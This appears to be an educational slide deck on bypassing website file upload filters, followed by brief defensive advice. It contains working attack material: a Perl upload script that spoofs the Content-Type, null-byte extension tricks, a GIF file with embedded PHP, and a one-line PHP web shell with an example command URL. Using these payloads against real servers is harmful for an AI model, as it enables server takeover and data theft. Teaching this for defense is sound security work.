Bypass file upload restrictions

BYPASS FILE UPLOAD RESTRICTIONS ON WEBSITES

AND SECURITY MEASURES

By K. Subramanian K. R. Mukesh

File upload

• Necessity• Social networking websites, blogs, File sharing,

etc.• Web developers do not consider the threats• Files should be sanitized • If not, leads to local file inclusion and hacking• Filtering mechanisms

Methods of filtering

Content-Type verification

• HTTP POST – MIME typeContent-Disposition: form-data;

name="uploaded file []";filename="18.jpg"\r\n Content-Type : image/jpeg\r\n\r <file content>

• To bypass this filter, edit the Content-Type to an applicable one.

#!/usr/bin/perl#use LWP;use HTTP::Request::Common;$ua = $ua = LWP::UserAgent->new;;$req = $ua->request(POST'http://example.com/upload.PHP',Content_Type => 'form-data',Content => [userfile => ["sh.PHP", "sh.PHP","Content-Type" =>"application/pdf"],],);print $req->as_string();

An easy way – Tamper data

• Tamper data – Mozilla add-on allows to modify the POST data before submit

Filename extension verification

• Check the extension of the file• Filter out malicious extensions

$blacklist = array(".php", ".phtml", ".php3", ".php4");

• To bypass this, use NULL BYTES in filenamesh.php%00.pdf

(or)sh.asp;xx.pdf

• While uploading, extension is .pdf• When accessed, delivered to PHP interpreter

File content verification

• Applicable to image files• $imageinfo =getimagesize($_FILES['userfile']['tmp_name']);

• To bypass this, manually craft an image file with an embedded PHP code

Content-Type: image/gifGIF89a(...some binary data...)<?PHP

System($_GET[‘command’]);?>(....binary data…)

• PHP interpreter execute the php code inside a garbage of binary values

A Simple Demonstration

Towards Bypassing these Filters

Worst case scenario

• Local file inclusion – PHP shell upload• Simple PHP shell:

<?php System ($_GET [‘command’]);?>

• Executes commands on remote serverwww.example.com/uploads/sh.php?command=‘ifconfig’

• Entire control of the server – rooting it• Defacements, database access, credential

information theft, etc.

Security Measures

• Preventing direct access to the uploaded files$uploaddir = '/var/spool/uploads/';

# Outside of root

• Block web access using .htaccess fileIndexIgnore */*

• Overhead to read and write• Sometimes leads to potential directory

traversal attacks

Random file name implementation

• Prevents attacker knowing the name of the file uploaded

• Map the names in the database$res = $db->query("INSERT INTO uploads SET name=?,original_name=?”)

• Query while reading• A little overhead, but secure• Think again, leads to SQL injection

Conclusion

• Complicated to implement a secure file upload facility

• Many filters = slow response. Leads to Denial Of Service (DOS) attacks

• Best way is to maintain UPLOAD LOGS containing user info like ip address, helpful to trace an attacker

• Secure coding practices

Thank you